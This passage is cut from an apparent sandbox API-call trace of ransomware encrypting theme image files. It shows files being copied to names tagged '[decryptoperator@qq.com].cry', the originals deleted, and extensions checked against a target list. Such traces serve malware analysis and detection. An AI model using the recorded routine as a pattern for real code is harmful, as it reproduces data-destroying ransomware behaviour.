dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.497] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=32607) returned 1 [0044.497] CloseHandle (hObject=0x1b8) returned 1 [0044.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 0x20 [0044.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.499] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.499] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.499] GetLastError () returned 0x0 [0044.499] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x7f5f, lpOverlapped=0x0) returned 1 [0044.584] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x7f60, lpOverlapped=0x0) returned 1 [0044.585] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.585] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.585] SetEndOfFile (hFile=0x1f8) returned 1 [0044.587] CloseHandle (hObject=0x1f8) returned 1 [0044.588] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.588] SetEndOfFile (hFile=0x1b8) returned 1 [0044.588] CloseHandle (hObject=0x1b8) returned 1 [0044.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.589] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1 [0044.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.589] lstrlenW (lpString=".doc") returned 4 [0044.589] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.589] lstrlenW (lpString=".docx") returned 5 [0044.589] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.589] lstrlenW (lpString=".pdf") returned 4 [0044.589] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.589] lstrlenW (lpString=".xls") returned 4 [0044.589] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.589] lstrlenW (lpString=".xlsx") returned 5 [0044.589] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.589] lstrlenW (lpString=".ppt") returned 4 [0044.589] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.589] lstrlenW (lpString=".zip") returned 4 [0044.589] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.589] lstrlenW (lpString=".rar") returned 4 [0044.589] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.589] lstrlenW (lpString=".bz2") returned 4 [0044.589] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.589] lstrlenW (lpString=".7z") returned 3 [0044.589] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.589] lstrlenW (lpString=".dbf") returned 4 [0044.590] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".1cd") returned 4 [0044.590] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".jpg") returned 4 [0044.590] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".doc") returned 4 [0044.590] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString=".docx") returned 5 [0044.590] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.590] lstrlenW (lpString=".pdf") returned 4 [0044.590] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString=".xls") returned 4 [0044.590] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.590] lstrlenW (lpString=".xlsx") returned 5 [0044.590] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.590] lstrlenW (lpString=".ppt") returned 4 [0044.590] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".zip") returned 4 [0044.590] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.590] lstrlenW (lpString=".rar") returned 4 [0044.590] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.590] lstrlenW (lpString=".bz2") returned 4 [0044.590] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString=".7z") returned 3 [0044.590] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".dbf") returned 4 [0044.590] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".1cd") returned 4 [0044.590] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.590] lstrlenW (lpString=".jpg") returned 4 [0044.590] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.591] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.591] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.708] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=29925) returned 1 [0044.708] CloseHandle (hObject=0x1c0) returned 1 [0044.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 0x20 [0044.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.708] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.708] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.709] GetLastError () returned 0x0 [0044.709] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x74e5, lpOverlapped=0x0) returned 1 [0044.710] WriteFile (in: hFile=0x188, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x74f0, lpOverlapped=0x0) returned 1 [0044.712] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.712] WriteFile (in: hFile=0x188, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.712] SetEndOfFile (hFile=0x188) returned 1 [0044.712] CloseHandle (hObject=0x188) returned 1 [0044.712] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.712] SetEndOfFile (hFile=0x1c0) returned 1 [0044.713] CloseHandle (hObject=0x1c0) returned 1 [0044.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.713] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString=".doc") returned 4 [0044.714] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.714] lstrlenW (lpString=".docx") returned 5 [0044.714] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.714] lstrlenW (lpString=".pdf") returned 4 [0044.714] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.714] lstrlenW (lpString=".xls") returned 4 [0044.714] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.714] lstrlenW (lpString=".xlsx") returned 5 [0044.714] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.714] lstrlenW (lpString=".ppt") returned 4 [0044.714] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString=".zip") returned 4 [0044.714] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.714] lstrlenW (lpString=".rar") returned 4 [0044.714] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.714] lstrlenW (lpString=".bz2") returned 4 [0044.714] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.714] lstrlenW (lpString=".7z") returned 3 [0044.714] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString=".dbf") returned 4 [0044.714] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString=".1cd") returned 4 [0044.714] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString=".jpg") returned 4 [0044.714] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.715] lstrlenW (lpString=".doc") returned 4 [0044.715] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.715] lstrlenW (lpString=".docx") returned 5 [0044.715] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.715] lstrlenW (lpString=".pdf") returned 4 [0044.715] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.715] lstrlenW (lpString=".xls") returned 4 [0044.715] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.715] lstrlenW (lpString=".xlsx") returned 5 [0044.715] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.715] lstrlenW (lpString=".ppt") returned 4 [0044.715] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.715] lstrlenW (lpString=".zip") returned 4 [0044.715] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.715] lstrlenW (lpString=".rar") returned 4 [0044.715] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.715] lstrlenW (lpString=".bz2") returned 4 [0044.715] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.715] lstrlenW (lpString=".7z") returned 3 [0044.715] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.715] lstrlenW (lpString=".dbf") returned 4 [0044.715] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.715] lstrlenW (lpString=".1cd") returned 4 [0044.715] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.715] lstrlenW (lpString=".jpg") returned 4 [0044.715] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.715] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.715] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.716] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1293) returned 1 [0044.716] CloseHandle (hObject=0x1c0) returned 1 [0044.716] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 0x20 [0044.716] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0044.716] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.716] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.718] GetLastError () returned 0x0 [0044.718] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x50d, lpOverlapped=0x0) returned 1 [0044.965] WriteFile (in: hFile=0x188, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x510, lpOverlapped=0x0) returned 1 [0044.966] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.966] WriteFile (in: hFile=0x188, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.966] SetEndOfFile (hFile=0x188) returned 1 [0044.966] CloseHandle (hObject=0x188) returned 1 [0044.966] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.966] SetEndOfFile (hFile=0x1c0) returned 1 [0044.967] CloseHandle (hObject=0x1c0) returned 1 [0044.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.967] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 1 [0044.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString=".doc") returned 4 [0044.968] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.968] lstrlenW (lpString=".docx") returned 5 [0044.968] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.968] lstrlenW (lpString=".pdf") returned 4 [0044.968] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.968] lstrlenW (lpString=".xls") returned 4 [0044.968] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.968] lstrlenW (lpString=".xlsx") returned 5 [0044.968] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.968] lstrlenW (lpString=".ppt") returned 4 [0044.968] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString=".zip") returned 4 [0044.968] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.968] lstrlenW (lpString=".rar") returned 4 [0044.968] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.968] lstrlenW (lpString=".bz2") returned 4 [0044.968] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.968] lstrlenW (lpString=".7z") returned 3 [0044.968] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString=".dbf") returned 4 [0044.968] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString=".1cd") returned 4 [0044.968] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString=".jpg") returned 4 [0044.968] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.968] lstrlenW (lpString=".doc") returned 4 [0044.968] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.968] lstrlenW (lpString=".docx") returned 5 [0044.969] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.969] lstrlenW (lpString=".pdf") returned 4 [0044.969] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.969] lstrlenW (lpString=".xls") returned 4 [0044.969] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.969] lstrlenW (lpString=".xlsx") returned 5 [0044.969] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.969] lstrlenW (lpString=".ppt") returned 4 [0044.969] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.969] lstrlenW (lpString=".zip") returned 4 [0044.969] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.969] lstrlenW (lpString=".rar") returned 4 [0044.969] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.969] lstrlenW (lpString=".bz2") returned 4 [0044.969] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.969] lstrlenW (lpString=".7z") returned 3 [0044.969] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.969] lstrlenW (lpString=".dbf") returned 4 [0044.969] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.969] lstrlenW (lpString=".1cd") returned 4 [0044.969] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.969] lstrlenW (lpString=".jpg") returned 4 [0044.969] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.969] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.969] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" 